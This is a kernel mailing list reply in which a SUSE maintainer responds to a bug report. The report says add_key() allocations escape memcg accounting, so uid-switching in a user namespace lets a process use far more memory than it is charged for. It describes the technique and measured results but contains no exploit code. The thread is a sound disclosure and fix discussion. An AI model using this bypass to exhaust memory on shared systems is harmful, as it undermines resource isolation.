add_key() syscall can lead to bypassing memcg limits

Michal Hocko mhocko at suse.com
Mon Mar 29 07:39:42 UTC 2021

Cc keyctl maintainers

On Sun 28-03-21 10:30:34, 杨昱天 wrote:
> Hi, our team has found a bug in key_alloc() on Linux kernel v5.10.19, which leads to bypassing memcg limits.
> The bug is caused by the code snippets listed below:
>
> /*--------------- key.c --------------------*/
> 276/* allocate and initialise the key and its description */
> 277key = kmem_cache_zalloc(key_jar, GFP_KERNEL);
> 278if (!key)
> 279goto no_memory_2;
> /*---------------- end ---------------------*/
>
> /*------------- keyctl.c -------------------*/
> 95  if (_description) {
> 96description = strndup_user(_description, KEY_MAX_DESC_SIZE);
> 97if (IS_ERR(description)) {
> /*--------------- end ---------------------*/
>
> Each user can allocate ~20KB uncharged memory by calling add_key syscall to trigger the listed code.
> Code at line 277 in the first snippet allocates a new struct key object that is not charged by memcg, as no accouting flag is passed to neither the
> allocation site here nor the key_jar's creating site. At line 96 in the second snippet, we found that memory used by description of a key,
> which has a maximum size of 4096 bytes, is also not charged. A user can allocate multiple keys and consume more uncharged memory.
> The upper limit of key memory's size is set to 20,000 bytes by default for each user.
>
> The bug can cause severe memcg limit bypassing if a process can change its uid and bypass the above limit. For example, a user may own root privilege
> in its user namespace and leverage seteuid() syscall to continuously change its uid.
> Our evaluation on QEMU v5.1.0 + cgroup v2 shows that, under this assumption, we could consume ~2.2G memory by allocating keys from 100,000 different uids, while the memory charged by memcg is ~215MB.

Can the user/attacker create all those different uids? Or what would be
a typical scenario where this a threat? In other words is this a
practical attack vector?

If yes then the mitigation woulld be quite easy for the key_jar (just
add __GFP_ACCOUNT). I am not aware we would have strndup_user
alternative with kemecg enabled so this would have to be added.

--
Michal Hocko
SUSE Labs